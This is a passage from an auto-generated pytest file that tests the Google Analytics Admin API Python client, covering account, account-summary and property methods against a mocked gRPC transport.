AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_accounts), "__call__", new_callable=mock.AsyncMock ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListAccountsResponse( accounts=[ resources.Account(), resources.Account(), resources.Account(), ], next_page_token="abc", ), analytics_admin.ListAccountsResponse(accounts=[], next_page_token="def",), analytics_admin.ListAccountsResponse( accounts=[resources.Account(),], next_page_token="ghi", ), analytics_admin.ListAccountsResponse( accounts=[resources.Account(), resources.Account(),], ), RuntimeError, ) async_pager = await client.list_accounts(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.Account) for i in responses) @pytest.mark.asyncio async def test_list_accounts_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_accounts), "__call__", new_callable=mock.AsyncMock ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListAccountsResponse( accounts=[ resources.Account(), resources.Account(), resources.Account(), ], next_page_token="abc", ), analytics_admin.ListAccountsResponse(accounts=[], next_page_token="def",), analytics_admin.ListAccountsResponse( accounts=[resources.Account(),], next_page_token="ghi", ), analytics_admin.ListAccountsResponse( accounts=[resources.Account(), resources.Account(),], ), RuntimeError, ) pages = [] async for page_ in (await client.list_accounts(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_delete_account( transport: str = "grpc", request_type=analytics_admin.DeleteAccountRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteAccountRequest() # Establish that the response is the type that we expect. assert response is None def test_delete_account_from_dict(): test_delete_account(request_type=dict) def test_delete_account_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_account), "__call__") as call: client.delete_account() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteAccountRequest() @pytest.mark.asyncio async def test_delete_account_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteAccountRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteAccountRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_delete_account_async_from_dict(): await test_delete_account_async(request_type=dict) def test_delete_account_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteAccountRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_account), "__call__") as call: call.return_value = None client.delete_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_account_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteAccountRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_account), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_account_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_account(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_account_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_account( analytics_admin.DeleteAccountRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_account_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.delete_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_account(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_account_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_account( analytics_admin.DeleteAccountRequest(), name="name_value", ) def test_update_account( transport: str = "grpc", request_type=analytics_admin.UpdateAccountRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Account( name="name_value", display_name="display_name_value", region_code="region_code_value", deleted=True, ) response = client.update_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateAccountRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Account) assert response.name == "name_value" assert response.display_name == "display_name_value" assert response.region_code == "region_code_value" assert response.deleted is True def test_update_account_from_dict(): test_update_account(request_type=dict) def test_update_account_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_account), "__call__") as call: client.update_account() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateAccountRequest() @pytest.mark.asyncio async def test_update_account_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateAccountRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.Account( name="name_value", display_name="display_name_value", region_code="region_code_value", deleted=True, ) ) response = await client.update_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateAccountRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Account) assert response.name == "name_value" assert response.display_name == "display_name_value" assert response.region_code == "region_code_value" assert response.deleted is True @pytest.mark.asyncio async def test_update_account_async_from_dict(): await test_update_account_async(request_type=dict) def test_update_account_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateAccountRequest() request.account.name = "account.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_account), "__call__") as call: call.return_value = resources.Account() client.update_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "account.name=account.name/value",) in kw[ "metadata" ] @pytest.mark.asyncio async def test_update_account_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateAccountRequest() request.account.name = "account.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_account), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Account()) await client.update_account(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "account.name=account.name/value",) in kw[ "metadata" ] def test_update_account_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Account() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_account( account=resources.Account(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].account == resources.Account(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_account_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_account( analytics_admin.UpdateAccountRequest(), account=resources.Account(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_account_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.update_account), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Account() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Account()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_account( account=resources.Account(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].account == resources.Account(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_account_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_account( analytics_admin.UpdateAccountRequest(), account=resources.Account(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_provision_account_ticket( transport: str = "grpc", request_type=analytics_admin.ProvisionAccountTicketRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.provision_account_ticket), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ProvisionAccountTicketResponse( account_ticket_id="account_ticket_id_value", ) response = client.provision_account_ticket(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ProvisionAccountTicketRequest() # Establish that the response is the type that we expect. assert isinstance(response, analytics_admin.ProvisionAccountTicketResponse) assert response.account_ticket_id == "account_ticket_id_value" def test_provision_account_ticket_from_dict(): test_provision_account_ticket(request_type=dict) def test_provision_account_ticket_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.provision_account_ticket), "__call__" ) as call: client.provision_account_ticket() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ProvisionAccountTicketRequest() @pytest.mark.asyncio async def test_provision_account_ticket_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ProvisionAccountTicketRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.provision_account_ticket), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ProvisionAccountTicketResponse( account_ticket_id="account_ticket_id_value", ) ) response = await client.provision_account_ticket(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ProvisionAccountTicketRequest() # Establish that the response is the type that we expect. assert isinstance(response, analytics_admin.ProvisionAccountTicketResponse) assert response.account_ticket_id == "account_ticket_id_value" @pytest.mark.asyncio async def test_provision_account_ticket_async_from_dict(): await test_provision_account_ticket_async(request_type=dict) def test_list_account_summaries( transport: str = "grpc", request_type=analytics_admin.ListAccountSummariesRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_account_summaries), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListAccountSummariesResponse( next_page_token="next_page_token_value", ) response = client.list_account_summaries(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListAccountSummariesRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListAccountSummariesPager) assert response.next_page_token == "next_page_token_value" def test_list_account_summaries_from_dict(): test_list_account_summaries(request_type=dict) def test_list_account_summaries_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_account_summaries), "__call__" ) as call: client.list_account_summaries() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListAccountSummariesRequest() @pytest.mark.asyncio async def test_list_account_summaries_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListAccountSummariesRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_account_summaries), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListAccountSummariesResponse( next_page_token="next_page_token_value", ) ) response = await client.list_account_summaries(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListAccountSummariesRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListAccountSummariesAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_account_summaries_async_from_dict(): await test_list_account_summaries_async(request_type=dict) def test_list_account_summaries_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_account_summaries), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListAccountSummariesResponse( account_summaries=[ resources.AccountSummary(), resources.AccountSummary(), resources.AccountSummary(), ], next_page_token="abc", ), analytics_admin.ListAccountSummariesResponse( account_summaries=[], next_page_token="def", ), analytics_admin.ListAccountSummariesResponse( account_summaries=[resources.AccountSummary(),], next_page_token="ghi", ), analytics_admin.ListAccountSummariesResponse( account_summaries=[ resources.AccountSummary(), resources.AccountSummary(), ], ), RuntimeError, ) metadata = () pager = client.list_account_summaries(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.AccountSummary) for i in results) def test_list_account_summaries_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_account_summaries), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListAccountSummariesResponse( account_summaries=[ resources.AccountSummary(), resources.AccountSummary(), resources.AccountSummary(), ], next_page_token="abc", ), analytics_admin.ListAccountSummariesResponse( account_summaries=[], next_page_token="def", ), analytics_admin.ListAccountSummariesResponse( account_summaries=[resources.AccountSummary(),], next_page_token="ghi", ), analytics_admin.ListAccountSummariesResponse( account_summaries=[ resources.AccountSummary(), resources.AccountSummary(), ], ), RuntimeError, ) pages = list(client.list_account_summaries(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_account_summaries_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_account_summaries), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListAccountSummariesResponse( account_summaries=[ resources.AccountSummary(), resources.AccountSummary(), resources.AccountSummary(), ], next_page_token="abc", ), analytics_admin.ListAccountSummariesResponse( account_summaries=[], next_page_token="def", ), analytics_admin.ListAccountSummariesResponse( account_summaries=[resources.AccountSummary(),], next_page_token="ghi", ), analytics_admin.ListAccountSummariesResponse( account_summaries=[ resources.AccountSummary(), resources.AccountSummary(), ], ), RuntimeError, ) async_pager = await client.list_account_summaries(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all(isinstance(i, resources.AccountSummary) for i in responses) @pytest.mark.asyncio async def test_list_account_summaries_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_account_summaries), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListAccountSummariesResponse( account_summaries=[ resources.AccountSummary(), resources.AccountSummary(), resources.AccountSummary(), ], next_page_token="abc", ), analytics_admin.ListAccountSummariesResponse( account_summaries=[], next_page_token="def", ), analytics_admin.ListAccountSummariesResponse( account_summaries=[resources.AccountSummary(),], next_page_token="ghi", ), analytics_admin.ListAccountSummariesResponse( account_summaries=[ resources.AccountSummary(), resources.AccountSummary(), ], ), RuntimeError, ) pages = [] async for page_ in (await client.list_account_summaries(request={})).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_get_property( transport: str = "grpc", request_type=analytics_admin.GetPropertyRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property( name="name_value", parent="parent_value", display_name="display_name_value", industry_category=resources.IndustryCategory.AUTOMOTIVE, time_zone="time_zone_value", currency_code="currency_code_value", service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD, ) response = client.get_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetPropertyRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Property) assert response.name == "name_value" assert response.parent == "parent_value" assert response.display_name == "display_name_value" assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE assert response.time_zone == "time_zone_value" assert response.currency_code == "currency_code_value" assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD def test_get_property_from_dict(): test_get_property(request_type=dict) def test_get_property_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_property), "__call__") as call: client.get_property() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetPropertyRequest() @pytest.mark.asyncio async def test_get_property_async( transport: str = "grpc_asyncio", request_type=analytics_admin.GetPropertyRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.Property( name="name_value", parent="parent_value", display_name="display_name_value", industry_category=resources.IndustryCategory.AUTOMOTIVE, time_zone="time_zone_value", currency_code="currency_code_value", service_level=resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD, ) ) response = await client.get_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.GetPropertyRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.Property) assert response.name == "name_value" assert response.parent == "parent_value" assert response.display_name == "display_name_value" assert response.industry_category == resources.IndustryCategory.AUTOMOTIVE assert response.time_zone == "time_zone_value" assert response.currency_code == "currency_code_value" assert response.service_level == resources.ServiceLevel.GOOGLE_ANALYTICS_STANDARD @pytest.mark.asyncio async def test_get_property_async_from_dict(): await test_get_property_async(request_type=dict) def test_get_property_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetPropertyRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_property), "__call__") as call: call.return_value = resources.Property() client.get_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_get_property_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.GetPropertyRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_property), "__call__") as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Property()) await client.get_property(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_get_property_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.get_property(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_property_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_property( analytics_admin.GetPropertyRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_property_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.get_property), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = resources.Property() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Property()) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_property(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_property_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_property( analytics_admin.GetPropertyRequest(), name="name_value", ) def test_list_properties( transport: str = "grpc", request_type=analytics_admin.ListPropertiesRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_properties), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListPropertiesResponse( next_page_token="next_page_token_value", ) response = client.list_properties(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListPropertiesRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListPropertiesPager) assert response.next_page_token == "next_page_token_value" def test_list_properties_from_dict(): test_list_properties(request_type=dict) def test_list_properties_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_properties), "__call__") as call: client.list_properties() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListPropertiesRequest() @pytest.mark.asyncio async def test_list_properties_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListPropertiesRequest ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_properties), "__call__") as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListPropertiesResponse( next_page_token="next_page_token_value", ) ) response = await client.list_properties(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListPropertiesRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListPropertiesAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_properties_async_from_dict(): await test_list_properties_async(request_type=dict) def test_list_properties_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object(type(client.transport.list_properties), "__call__") as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListPropertiesResponse( properties=[ resources.Property(), resources.Property(), resources.Property(), ], next_page_token="abc", ), analytics_admin.ListPropertiesResponse( properties=[], next_page_token="def", ), analytics_admin.ListPropertiesResponse( properties=[resources.Property(),], next_page_token="ghi", ), analytics_admin.ListPropertiesResponse( properties=[resources.Property(), resources.Property(),], ), RuntimeError, ) metadata = () pager = client.list_properties(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all(isinstance(i, resources.Property) for i in results) def test_list_properties_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with 